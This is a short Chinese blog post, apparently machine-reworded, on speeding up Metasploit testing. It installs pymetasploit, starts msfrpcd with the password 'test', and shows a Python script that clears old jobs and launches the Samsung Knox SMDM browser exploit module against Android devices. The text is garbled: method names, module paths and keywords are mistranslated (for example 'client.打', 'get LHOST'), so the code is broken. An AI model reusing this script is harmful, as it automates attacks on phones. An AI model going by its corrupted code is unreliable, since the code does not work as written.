Metasploit快速测试脚本的TIPS
"坚信试过metasploit的同学们都很悲催,msfconsole悠长的开机时间,假如检测中敲错指令,或一不小心撤出后又重新启动每日任务,会给你立即伤脑。以前不愿反复敲指令,看过下metasploit的开发文档,发觉要自动化技术有各种各样计划方案,我觉得最便捷的是启用RPC插口,GITHUB上搜了把,发觉有大拿封裝好啦控制模块,立即启用只能:
安裝pymetasploit控制模块
git clone http://github.Com/allfro/pymetasploit
拷贝编码
切到文件目录
sudo python setup.py install
拷贝编码
起动metasploit的RPC服务项目
msfrpcd -P test -n -f -a 127.0.0.1
拷贝编码
这一test是rpc服务项目的登陆密码,登录名默认设置是msf
订制自身的检测脚本制作
我这儿订制的是检测三星手机knox系统漏洞的脚本制作,构思是每一次起动先把以前运作的job和console停用,随后全自动建立1个console全自动敲入指令开展新的系统漏洞检测,立即crtl-c完毕脚本制作再再次检测全是1个新的job,并且每一次检测全是秒开,无需再重新启动msfconsole了。正中间各种各样插口如何使用,强烈推荐大伙儿再翻下官方网的文本文档。
from metasploit.msfrpc import MsfRpcClient
import time
client = MsfRpcClient('test')
jobs = client.打('job.list')
For num In jobs.keys():
if jobs[num].find('samsung_knox_smdm_网页地址')>0:
client.打('job.stop',num)
console = client.打('console.list')
For _console In console['consoles']:
if _console.has_key('prompt'):
if _console['prompt'].find('samsung_knox_smdm_网页地址')>0:
client.打('console.destroy', _console['Id'])
cmd='''
use exploit/android/browser/samsung_knox_smdm_网页地址
get LHOST 127.0.0.1
exploit
'''
相关文章
- 1条评论
- 可难南简2022-05-28 23:51:28
- oit拷贝编码切到文件目录 sudo python setup.py install拷贝编码 起动metasploit的RPC服务项目 m